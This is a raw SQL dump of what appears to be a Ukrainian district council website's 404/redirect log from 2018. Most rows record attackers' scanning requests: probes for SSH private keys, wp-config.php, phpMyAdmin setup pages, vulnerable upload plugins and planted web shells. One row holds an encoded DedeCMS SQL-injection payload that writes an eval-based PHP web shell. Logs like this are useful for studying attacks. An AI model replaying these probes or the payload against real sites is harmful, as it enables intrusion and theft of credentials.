00:00:00',301),(32283,'http://malyn-rayrada.gov.ua/.ssh/id_ecdsa',NULL,'','',1,0,'2018-08-09 23:43:32','0000-00-00 00:00:00',301),(32284,'http://malyn-rayrada.gov.ua/.ssh/id_ed25519',NULL,'','',1,0,'2018-08-09 23:43:32','0000-00-00 00:00:00',301),(32285,'http://www.malyn-rayrada.gov.ua/index.php/2061-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'','',7,0,'2018-08-13 12:21:24','0000-00-00 00:00:00',301),(32286,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2064-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2018-rik',NULL,'','',13,0,'2018-08-13 13:23:38','0000-00-00 00:00:00',301),(32287,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2064-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2018-rik',NULL,'','',22,0,'2018-08-13 21:40:35','0000-00-00 00:00:00',301),(32288,'http://malyn-rayrada.gov.ua/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35',NULL,'','',2,0,'2018-08-16 14:41:56','0000-00-00 00:00:00',301),(32289,'http://malyn-rayrada.gov.ua/plus/ad_js.php?aid=19',NULL,'','',2,0,'2018-08-16 14:41:57','0000-00-00 00:00:00',301),(32290,'http://malyn-rayrada.gov.ua/plus/read.php',NULL,'','',2,0,'2018-08-16 14:41:58','0000-00-00 00:00:00',301),(32291,'http://malyn-rayrada.gov.ua/include/dialog/select_soft_post.php',NULL,'','',2,0,'2018-08-16 14:41:59','0000-00-00 00:00:00',301),(32292,'http://malyn-rayrada.gov.ua/data/cache/asd.php',NULL,'','',2,0,'2018-08-16 14:42:00','0000-00-00 00:00:00',301),(32293,'http://malyn-rayrada.gov.ua/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2018-08-16 14:42:02','0000-00-00 00:00:00',301),(32294,'http://malyn-rayrada.gov.ua/vendor/phpunit/phpunit/src/util/php/asd.php',NULL,'','',2,0,'2018-08-16 14:42:03','0000-00-00 00:00:00',301),(32295,'http://malyn-rayrada.gov.ua/install.php?finish=1',NULL,'http://malyn-rayrada.gov.ua/install.php','',2,0,'2018-08-16 14:42:12','0000-00-00 00:00:00',301),(32296,'http://malyn-rayrada.gov.ua/da.php',NULL,'http://malyn-rayrada.gov.ua/install.php','',2,0,'2018-08-16 14:42:12','0000-00-00 00:00:00',301),(32297,'http://malyn-rayrada.gov.ua/dayrui/libraries/chart/ofc_upload_image.php?name=shell7868.php',NULL,'','',1,0,'2018-08-16 14:42:13','0000-00-00 00:00:00',301),(32298,'http://malyn-rayrada.gov.ua/dayrui/libraries/tmp-upload-images/shell7868.php',NULL,'','',1,0,'2018-08-16 14:42:14','0000-00-00 00:00:00',301),(32299,'http://www.malyn-rayrada.gov.ua/attachments/article/2060/питання томосу.pdf',NULL,'','',3,0,'2018-08-17 07:51:43','0000-00-00 00:00:00',301),(32300,'http://www.malyn-rayrada.gov.ua/attachments/article/2066/ð“ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2018-08-17 16:37:50','0000-00-00 00:00:00',301),(32301,'http://malyn-rayrada.gov.ua/dayrui/libraries/chart/ofc_upload_image.php?name=shell8742.php',NULL,'','',1,0,'2018-08-18 19:28:46','0000-00-00 00:00:00',301),(32302,'http://malyn-rayrada.gov.ua/dayrui/libraries/tmp-upload-images/shell8742.php',NULL,'','',1,0,'2018-08-18 19:28:46','0000-00-00 00:00:00',301),(32303,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php','',1,0,'2018-08-23 23:31:43','0000-00-00 00:00:00',301),(32304,'http://malyn-rayrada.gov.ua/bak.php?login=canshu?',NULL,'','',1,0,'2018-08-27 17:42:08','0000-00-00 00:00:00',301),(32305,'http://malyn-rayrada.gov.ua/qq.php',NULL,'','',1,0,'2018-08-28 00:09:12','0000-00-00 00:00:00',301),(32306,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','',1,0,'2018-08-30 18:01:54','0000-00-00 00:00:00',301),(32307,'http://malyn-rayrada.gov.ua/attachments/article/2066/ð“ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2018-09-01 05:30:26','0000-00-00 00:00:00',301),(32308,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-formgenerator/uploads/php/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-formgenerator/uploads/php/','',1,0,'2018-09-02 07:19:58','0000-00-00 00:00:00',301),(32309,'http://malyn-rayrada.gov.ua/kickstart.php',NULL,'','',2,0,'2018-09-02 16:24:52','0000-00-00 00:00:00',301),(32310,'http://www.malyn-rayrada.gov.ua//adminer.php',NULL,'','',1,0,'2018-09-04 20:44:00','0000-00-00 00:00:00',301),(32311,'http://www.malyn-rayrada.gov.ua//phpminiadmin.php',NULL,'','',1,0,'2018-09-04 21:19:23','0000-00-00 00:00:00',301),(32312,'http://www.malyn-rayrada.gov.ua//mysql.php',NULL,'','',1,0,'2018-09-05 05:36:53','0000-00-00 00:00:00',301),(32313,'http://www.malyn-rayrada.gov.ua//install.php',NULL,'','',1,0,'2018-09-05 06:25:03','0000-00-00 00:00:00',301),(32314,'http://www.malyn-rayrada.gov.ua//connect.php',NULL,'','',1,0,'2018-09-05 08:28:47','0000-00-00 00:00:00',301),(32315,'http://www.malyn-rayrada.gov.ua//adminer-3.7.1.php',NULL,'','',1,0,'2018-09-05 08:55:42','0000-00-00 00:00:00',301),(32316,'http://www.malyn-rayrada.gov.ua//adminer-4.2.1.php',NULL,'','',1,0,'2018-09-05 09:37:17','0000-00-00 00:00:00',301),(32317,'http://www.malyn-rayrada.gov.ua//sqlyogtunnel.php',NULL,'','',1,0,'2018-09-05 10:06:23','0000-00-00 00:00:00',301),(32318,'http://malyn-rayrada.gov.ua/wp-check.php',NULL,'','',1,0,'2018-09-06 00:19:30','0000-00-00 00:00:00',301),(32319,'http://malyn-rayrada.gov.ua/wp-content/uploads/',NULL,'','',1,0,'2018-09-06 16:14:31','0000-00-00 00:00:00',301),(32320,'http://malyn-rayrada.gov.ua/wp-content/uploads/2018/09/',NULL,'','',1,0,'2018-09-06 16:14:33','0000-00-00 00:00:00',301),(32321,'http://malyn-rayrada.gov.ua/wp-includes/users.php',NULL,'','',1,0,'2018-09-06 16:14:53','0000-00-00 00:00:00',301),(32322,'http://malyn-rayrada.gov.ua/wp-content/plugins/upspy/index.php',NULL,'','',1,0,'2018-09-06 16:14:55','0000-00-00 00:00:00',301),(32323,'http://malyn-rayrada.gov.ua/wp-content/plugins/ubh/index.php',NULL,'','',1,0,'2018-09-06 16:14:58','0000-00-00 00:00:00',301),(32324,'http://malyn-rayrada.gov.ua/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',1,0,'2018-09-06 16:15:04','0000-00-00 00:00:00',301),(32325,'http://malyn-rayrada.gov.ua/wp-content/plugins/three-column-screen-layout/firewall.php',NULL,'','',1,0,'2018-09-06 16:15:07','0000-00-00 00:00:00',301),(32326,'http://malyn-rayrada.gov.ua/wp-content/plugins/html404/index.html',NULL,'','',1,0,'2018-09-06 16:15:11','0000-00-00 00:00:00',301),(32327,'http://malyn-rayrada.gov.ua/wp-admin/shapes.php',NULL,'','',1,0,'2018-09-06 16:15:22','0000-00-00 00:00:00',301),(32328,'http://malyn-rayrada.gov.ua/olux.php',NULL,'','',1,0,'2018-09-06 16:15:41','0000-00-00 00:00:00',301),(32329,'http://malyn-rayrada.gov.ua/indoxploit.php',NULL,'','',1,0,'2018-09-06 16:16:37','0000-00-00 00:00:00',301),(32330,'http://malyn-rayrada.gov.ua/wp-admin/network/wp-footer.php',NULL,'','',1,0,'2018-09-06 16:16:43','0000-00-00 00:00:00',301),(32331,'http://malyn-rayrada.gov.ua/wp-content/vuln.php',NULL,'','',1,0,'2018-09-06 16:16:47','0000-00-00 00:00:00',301),(32332,'http://malyn-rayrada.gov.ua/cloudxv3.php',NULL,'','',1,0,'2018-09-06 16:16:50','0000-00-00 00:00:00',301),(32333,'http://malyn-rayrada.gov.ua/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2018-09-06 16:16:51','0000-00-00 00:00:00',301),(32334,'http://malyn-rayrada.gov.ua/wp-content/plugins/three-column-screen-layout/db.php',NULL,'','',1,0,'2018-09-06 16:16:53','0000-00-00 00:00:00',301),(32335,'http://malyn-rayrada.gov.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=tgyijk',NULL,'','',1,0,'2018-09-06 16:17:01','0000-00-00 00:00:00',301),(32336,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',NULL,'','',1,0,'2018-09-06 16:17:04','0000-00-00 00:00:00',301),(32337,'http://malyn-rayrada.gov.ua/wp-content/plugins/simple-ads-manager/db.php',NULL,'','',1,0,'2018-09-06 16:17:06','0000-00-00 00:00:00',301),(32338,'http://malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/revslider/db.php',NULL,'','',1,0,'2018-09-06 16:17:08','0000-00-00 00:00:00',301),(32339,'http://malyn-rayrada.gov.ua/indax.php',NULL,'','',1,0,'2018-09-06 17:34:10','0000-00-00 00:00:00',301),(32340,'http://www.malyn-rayrada.gov.ua/login',NULL,'','',1,0,'2018-09-07 15:58:26','0000-00-00 00:00:00',301),(32341,'http://malyn-rayrada.gov.ua/umbraco',NULL,'','',1,0,'2018-09-07 15:58:26','0000-00-00 00:00:00',301),(32342,'http://www.malyn-rayrada.gov.ua/umbraco',NULL,'','',1,0,'2018-09-07 15:58:26','0000-00-00 00:00:00',301),(32343,'http://malyn-rayrada.gov.ua/sitecore',NULL,'','',1,0,'2018-09-07 15:58:26','0000-00-00 00:00:00',301),(32344,'http://www.malyn-rayrada.gov.ua/sitecore',NULL,'','',1,0,'2018-09-07 15:58:27','0000-00-00 00:00:00',301),(32345,'http://malyn-rayrada.gov.ua/maps.php',NULL,'','',1,0,'2018-09-09 03:46:58','0000-00-00 00:00:00',301),(32346,'http://malyn-rayrada.gov.ua/imprima.php',NULL,'','',1,0,'2018-09-09 08:50:57','0000-00-00 00:00:00',301),(32347,'http://malyn-rayrada.gov.ua/ludk.php',NULL,'','',1,0,'2018-09-09 21:09:11','0000-00-00 00:00:00',301),(32348,'http://malyn-rayrada.gov.ua/wp-version.php',NULL,'','',1,0,'2018-09-10 02:29:33','0000-00-00 00:00:00',301),(32349,'http://malyn-rayrada.gov.ua/wp-content_plugins_akismet_widget.php',NULL,'','',1,0,'2018-09-10 11:33:58','0000-00-00 00:00:00',301),(32350,'http://malyn-rayrada.gov.ua/marvin.php',NULL,'','',1,0,'2018-09-11 23:26:01','0000-00-00 00:00:00',301),(32351,'http://malyn-rayrada.gov.ua/wp-blog-config.php',NULL,'','',1,0,'2018-09-12 11:23:39','0000-00-00 00:00:00',301),(32352,'http://malyn-rayrada.gov.ua/phqmv.php',NULL,'','',1,0,'2018-09-13 00:36:06','0000-00-00 00:00:00',301),(32353,'http://malyn-rayrada.gov.ua/sfn.php',NULL,'','',1,0,'2018-09-13 06:00:22','0000-00-00 00:00:00',301),(32354,'http://malyn-rayrada.gov.ua/infos.php',NULL,'','',1,0,'2018-09-13 13:58:09','0000-00-00 00:00:00',301),(32355,'http://malyn-rayrada.gov.ua/error-logs.php',NULL,'','',1,0,'2018-09-13 19:25:41','0000-00-00 00:00:00',301),(32356,'http://malyn-rayrada.gov.ua/index.php/component/',NULL,'http://malyn-rayrada.gov.ua/','',3,0,'2018-09-14 01:33:17','0000-00-00 00:00:00',301),(32357,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/fluid_forms/file-upload/server/php/index.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','',1,0,'2018-09-14 07:35:43','0000-00-00 00:00:00',301),(32358,'http://malyn-rayrada.gov.ua/website/',NULL,'','',1,0,'2018-09-17 03:01:08','0000-00-00 00:00:00',301),(32359,'http://malyn-rayrada.gov.ua/beta/',NULL,'','',1,0,'2018-09-17 03:01:08','0000-00-00 00:00:00',301),(32360,'http://www.malyn-rayrada.gov.ua/site/',NULL,'','',2,0,'2018-09-17 06:00:29','0000-00-00 00:00:00',301),(32361,'http://www.malyn-rayrada.gov.ua/website/',NULL,'','',1,0,'2018-09-17 06:00:30','0000-00-00 00:00:00',301),(32362,'http://www.malyn-rayrada.gov.ua/beta/',NULL,'','',1,0,'2018-09-17 06:00:30','0000-00-00 00:00:00',301),(32363,'http://malyn-rayrada.gov.ua/test/',NULL,'','',1,0,'2018-09-18 00:59:07','0000-00-00 00:00:00',301),(32364,'http://malyn-rayrada.gov.ua/preview/',NULL,'','',1,0,'2018-09-18 00:59:07','0000-00-00 00:00:00',301),(32365,'http://malyn-rayrada.gov.ua/site2/',NULL,'','',1,0,'2018-09-18 00:59:07','0000-00-00 00:00:00',301),(32366,'http://malyn-rayrada.gov.ua/site1/',NULL,'','',1,0,'2018-09-18 00:59:08','0000-00-00 00:00:00',301),(32367,'http://malyn-rayrada.gov.ua/wordpress/test/',NULL,'','',1,0,'2018-09-18 00:59:08','0000-00-00 00:00:00',301),(32368,'http://www.malyn-rayrada.gov.ua/test/',NULL,'','',1,0,'2018-09-18 03:10:33','0000-00-00 00:00:00',301),(32369,'http://www.malyn-rayrada.gov.ua/preview/',NULL,'','',1,0,'2018-09-18 03:10:34','0000-00-00 00:00:00',301),(32370,'http://www.malyn-rayrada.gov.ua/site2/',NULL,'','',1,0,'2018-09-18 03:10:34','0000-00-00 00:00:00',301),(32371,'http://www.malyn-rayrada.gov.ua/site1/',NULL,'','',1,0,'2018-09-18 03:10:34','0000-00-00 00:00:00',301),(32372,'http://www.malyn-rayrada.gov.ua/wordpress/test/',NULL,'','',1,0,'2018-09-18 03:10:34','0000-00-00 00:00:00',301),(32373,'http://malyn-rayrada.gov.ua/wptest/',NULL,'','',1,0,'2018-09-18 15:18:11','0000-00-00 00:00:00',301),(32374,'http://www.malyn-rayrada.gov.ua/wptest/',NULL,'','',1,0,'2018-09-18 15:47:27','0000-00-00 00:00:00',301),(32375,'http://malyn-rayrada.gov.ua/old/',NULL,'','',2,0,'2018-09-18 22:24:14','0000-00-00 00:00:00',301),(32376,'http://malyn-rayrada.gov.ua/wp_old/',NULL,'','',1,0,'2018-09-18 22:24:14','0000-00-00 00:00:00',301),(32377,'http://malyn-rayrada.gov.ua/old_wp/',NULL,'','',1,0,'2018-09-18 22:24:14','0000-00-00 00:00:00',301),(32378,'http://www.malyn-rayrada.gov.ua/old/',NULL,'','',2,0,'2018-09-18 23:33:10','0000-00-00 00:00:00',301),(32379,'http://www.malyn-rayrada.gov.ua/wp_old/',NULL,'','',1,0,'2018-09-18 23:33:11','0000-00-00 00:00:00',301),(32380,'http://www.malyn-rayrada.gov.ua/old_wp/',NULL,'','',1,0,'2018-09-18 23:33:11','0000-00-00 00:00:00',301),(32381,'http://malyn-rayrada.gov.ua/wp1/',NULL,'','',1,0,'2018-09-19 05:00:33','0000-00-00 00:00:00',301),(32382,'http://malyn-rayrada.gov.ua/wp2/',NULL,'','',1,0,'2018-09-19 05:00:33','0000-00-00 00:00:00',301),(32383,'http://malyn-rayrada.gov.ua/wp3/',NULL,'','',1,0,'2018-09-19 05:00:33','0000-00-00 00:00:00',301),(32384,'http://www.malyn-rayrada.gov.ua/wp1/',NULL,'','',1,0,'2018-09-19 06:32:36','0000-00-00 00:00:00',301),(32385,'http://www.malyn-rayrada.gov.ua/wp2/',NULL,'','',1,0,'2018-09-19 06:32:36','0000-00-00 00:00:00',301),(32386,'http://www.malyn-rayrada.gov.ua/wp3/',NULL,'','',1,0,'2018-09-19 06:32:36','0000-00-00 00:00:00',301),(32387,'http://malyn-rayrada.gov.ua/portal/',NULL,'','',1,0,'2018-09-19 17:52:53','0000-00-00 00:00:00',301),(32388,'http://malyn-rayrada.gov.ua/press/',NULL,'','',1,0,'2018-09-19 17:52:54','0000-00-00 00:00:00',301),(32389,'http://malyn-rayrada.gov.ua/wp/test/',NULL,'','',1,0,'2018-09-19 17:52:54','0000-00-00 00:00:00',301),(32390,'http://malyn-rayrada.gov.ua/blogs/',NULL,'','',2,0,'2018-09-19 17:52:54','0000-00-00 00:00:00',301),(32391,'http://www.malyn-rayrada.gov.ua/news/',NULL,'','',1,0,'2018-09-19 20:05:33','0000-00-00 00:00:00',301),(32392,'http://www.malyn-rayrada.gov.ua/portal/',NULL,'','',1,0,'2018-09-19 20:05:33','0000-00-00 00:00:00',301),(32393,'http://www.malyn-rayrada.gov.ua/press/',NULL,'','',1,0,'2018-09-19 20:05:33','0000-00-00 00:00:00',301),(32394,'http://www.malyn-rayrada.gov.ua/wp/test/',NULL,'','',1,0,'2018-09-19 20:05:33','0000-00-00 00:00:00',301),(32395,'http://www.malyn-rayrada.gov.ua/blogs/',NULL,'','',2,0,'2018-09-19 20:05:34','0000-00-00 00:00:00',301),(32396,'http://malyn-rayrada.gov.ua/v1/',NULL,'','',1,0,'2018-09-20 08:11:52','0000-00-00 00:00:00',301),(32397,'http://malyn-rayrada.gov.ua/v2/',NULL,'','',1,0,'2018-09-20 08:11:53','0000-00-00 00:00:00',301),(32398,'http://malyn-rayrada.gov.ua/cms/',NULL,'','',1,0,'2018-09-20 08:11:53','0000-00-00 00:00:00',301),(32399,'http://malyn-rayrada.gov.ua/panel/',NULL,'','',1,0,'2018-09-20 08:11:53','0000-00-00 00:00:00',301),(32400,'http://malyn-rayrada.gov.ua/demo/',NULL,'','',1,0,'2018-09-20 08:11:53','0000-00-00 00:00:00',301),(32401,'http://malyn-rayrada.gov.ua/home/',NULL,'','',1,0,'2018-09-20 08:11:54','0000-00-00 00:00:00',301),(32402,'http://malyn-rayrada.gov.ua/main/',NULL,'','',1,0,'2018-09-20 08:11:54','0000-00-00 00:00:00',301),(32403,'http://www.malyn-rayrada.gov.ua/v1/',NULL,'','',1,0,'2018-09-20 11:09:13','0000-00-00 00:00:00',301),(32404,'http://www.malyn-rayrada.gov.ua/v2/',NULL,'','',1,0,'2018-09-20 11:09:13','0000-00-00 00:00:00',301),(32405,'http://www.malyn-rayrada.gov.ua/cms/',NULL,'','',1,0,'2018-09-20 11:09:14','0000-00-00 00:00:00',301),(32406,'http://www.malyn-rayrada.gov.ua/panel/',NULL,'','',1,0,'2018-09-20 11:09:14','0000-00-00 00:00:00',301),(32407,'http://www.malyn-rayrada.gov.ua/demo/',NULL,'','',1,0,'2018-09-20 11:09:14','0000-00-00 00:00:00',301),(32408,'http://www.malyn-rayrada.gov.ua/home/',NULL,'','',1,0,'2018-09-20 11:09:14','0000-00-00 00:00:00',301),(32409,'http://www.malyn-rayrada.gov.ua/main/',NULL,'','',1,0,'2018-09-20 11:09:15','0000-00-00 00:00:00',301),(32410,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/golodomor3.jpg',NULL,'','',1,0,'2018-09-24 23:34:54','0000-00-00 00:00:00',301),(32411,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/golodomor2.jpg',NULL,'','',1,0,'2018-09-24 23:34:57','0000-00-00 00:00:00',301),(32412,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_1.jpg',NULL,'','',1,0,'2018-09-24 23:34:57','0000-00-00 00:00:00',301),(32413,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_3.jpg',NULL,'','',1,0,'2018-09-24 23:34:58','0000-00-00 00:00:00',301),(32414,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/03_aaa.jpg',NULL,'','',1,0,'2018-09-24 23:34:59','0000-00-00 00:00:00',301),(32415,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_2.jpg',NULL,'','',1,0,'2018-09-24 23:34:59','0000-00-00 00:00:00',301),(32416,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/goodomor_1.jpg',NULL,'','',1,0,'2018-09-24 23:35:00','0000-00-00 00:00:00',301),(32417,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/wgolodomor33.jpg',NULL,'','',1,0,'2018-09-24 23:35:02','0000-00-00 00:00:00',301),(32418,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_4.jpg',NULL,'','',1,0,'2018-09-24 23:35:05','0000-00-00 00:00:00',301),(32419,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/0_dubr_1.jpg',NULL,'','',1,0,'2018-09-24 23:35:08','0000-00-00 00:00:00',301),(32420,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/stories/wgolodomor32.jpg',NULL,'','',1,0,'2018-09-24 23:35:15','0000-00-00 00:00:00',301),(32421,'http://www.malyn-rayrada.gov.ua/wp-content/themes/rightnow/includes/uploadify/upload_settings_image.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',1,0,'2018-09-27 06:12:24','0000-00-00 00:00:00',301),(32422,'http://www.malyn-rayrada.gov.ua/happy.php',NULL,'','',3,0,'2018-09-28 09:39:37','0000-00-00 00:00:00',301),(32423,'http://www.malyn-rayrada.gov.ua/wp-updats.php',NULL,'','',6,0,'2018-09-30 10:39:31','0000-00-00 00:00:00',301),(32424,'http://www.malyn-rayrada.gov.ua/modules/simpleslideshow/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/simpleslideshow/uploadimage.php','',1,0,'2018-10-01 05:44:07','0000-00-00 00:00:00',301),(32425,'http://malyn-rayrada.gov.ua/cpanel',NULL,'','',1,0,'2018-10-02 21:00:10','0000-00-00 00:00:00',301),(32426,'http://www.malyn-rayrada.gov.ua/mother.php',NULL,'','',3,0,'2018-10-03 06:36:57','0000-00-00 00:00:00',301),(32427,'http://malyn-rayrada.gov.ua/accesson.php',NULL,'','',1,0,'2018-10-05 07:08:11','0000-00-00 00:00:00',301),(32428,'http://malyn-rayrada.gov.ua/assets/images/accesson.php',NULL,'','',1,0,'2018-10-06 00:47:27','0000-00-00 00:00:00',301),(32429,'http://malyn-rayrada.gov.ua/payload.php',NULL,'','',1,0,'2018-10-06 18:03:48','0000-00-00 00:00:00',301),(32430,'http://www.malyn-rayrada.gov.ua/modules/columnadverts/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/columnadverts/uploadimage.php','',1,0,'2018-10-07 20:13:29','0000-00-00 00:00:00',301),(32431,'http://malyn-rayrada.gov.ua/wp-admin/yt.php',NULL,'','',1,0,'2018-10-09 15:37:28','0000-00-00 00:00:00',301),(32432,'http://malyn-rayrada.gov.ua/wp-includes/css/login_wall.php?login=cmd',NULL,'','',1,0,'2018-10-10 07:50:29','0000-00-00 00:00:00',301),(32433,'http://malyn-rayrada.gov.ua/wp-admin/maint/index.php',NULL,'','',1,0,'2018-10-11 00:06:56','0000-00-00 00:00:00',301),(32434,'http://malyn-rayrada.gov.ua/wp-content/plugins/background-image-cropper/image/ico/search.php',NULL,'','',1,0,'2018-10-11 14:20:30','0000-00-00 00:00:00',301),(32435,'http://malyn-rayrada.gov.ua/wp-admin/includes/index.php',NULL,'','',1,0,'2018-10-12 05:08:40','0000-00-00 00:00:00',301),(32436,'http://malyn-rayrada.gov.ua/wp-content/themes/better-mag/footer.php',NULL,'','',1,0,'2018-10-12 19:22:23','0000-00-00 00:00:00',301),(32437,'http://malyn-rayrada.gov.ua/wp-content/themes/twentyfifteen/content-link.php',NULL,'','',1,0,'2018-10-14 00:14:32','0000-00-00 00:00:00',301),(32438,'http://www.malyn-rayrada.gov.ua/rxr.php?rxr',NULL,'http://www.malyn-rayrada.gov.ua/rxr.php?rxr','',1,0,'2018-10-14 14:32:40','0000-00-00 00:00:00',301),(32439,'http://malyn-rayrada.gov.ua/wp-content/themes/sketch/404.php',NULL,'','',1,0,'2018-10-14 15:22:58','0000-00-00 00:00:00',301),(32440,'http://malyn-rayrada.gov.ua/interst.php?action=test',NULL,'','',1,0,'2018-10-15 06:13:13','0000-00-00 00:00:00',301),(32441,'http://malyn-rayrada.gov.ua/wp-content/themes/twentyseventeen/404.php',NULL,'','',2,0,'2018-10-15 22:55:47','0000-00-00 00:00:00',301),(32442,'http://malyn-rayrada.gov.ua/bea_wls_deployment_internal',NULL,'','',2,0,'2018-10-16 22:27:34','0000-00-00 00:00:00',301),(32443,'http://malyn-rayrada.gov.ua/_phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2018-10-16 22:27:37','0000-00-00 00:00:00',301),(32444,'http://malyn-rayrada.gov.ua/scripts/setup.php',NULL,'','',1,0,'2018-10-16 22:27:38','0000-00-00 00:00:00',301),(32445,'http://malyn-rayrada.gov.ua/pma/scripts/setup.php',NULL,'','',1,0,'2018-10-16 22:27:40','0000-00-00 00:00:00',301),(32446,'http://malyn-rayrada.gov.ua/phpmyadmin/scripts/setup.php',NULL,'','',2,0,'2018-10-16 22:27:42','0000-00-00 00:00:00',301),(32447,'http://malyn-rayrada.gov.ua/wp-content/themes/template-parts/content-single.php',NULL,'','',1,0,'2018-10-17 04:36:17','0000-00-00 00:00:00',301),(32448,'http://www.malyn-rayrada.gov.ua/media/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/media/logo_img.php','',1,0,'2018-10-17 15:05:50','0000-00-00 00:00:00',301),(32449,'http://malyn-rayrada.gov.ua/wp-content/themes/twentyseventeen/inc/color-patterns.php',NULL,'','',1,0,'2018-10-17 18:48:42','0000-00-00 00:00:00',301),(32450,'http://malyn-rayrada.gov.ua/status',NULL,'','',6,0,'2018-10-17 21:24:58','0000-00-00 00:00:00',301),(32451,'http://www.malyn-rayrada.gov.ua/assets/fileupload/server/php/files/index.php',NULL,'','',1,0,'2018-10-19 01:15:23','0000-00-00 00:00:00',301),(32452,'http://www.malyn-rayrada.gov.ua/assets/fileupload/server/php/index.php',NULL,'','',2,0,'2018-10-19 03:43:55','0000-00-00 00:00:00',301),(32453,'http://malyn-rayrada.gov.ua/wp-content/themes/twentytwelve/404.php',NULL,'','',1,0,'2018-10-19 05:32:27','0000-00-00 00:00:00',301),(32454,'http://www.malyn-rayrada.gov.ua/wp-config.php',NULL,'','',1,0,'2018-10-21 16:28:24','0000-00-00 00:00:00',301),(32455,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/easyrotator-for-wordpress/indox.php',NULL,'','',3,0,'2018-10-21 19:10:40','0000-00-00 00:00:00',301),(32456,'http://malyn-rayrada.gov.ua/wp-content/themes/twentyseventeen/footer.php',NULL,'','',1,0,'2018-10-22 16:15:38','0000-00-00 00:00:00',301),(32457,'http://malyn-rayrada.gov.ua/wp-content/themes/classic/404.php',NULL,'','',1,0,'2018-10-23 09:37:22','0000-00-00 00:00:00',301),(32458,'http://malyn-rayrada.gov.ua/wp-content/themes/advancesettings/404.php',NULL,'','',1,0,'2018-10-24 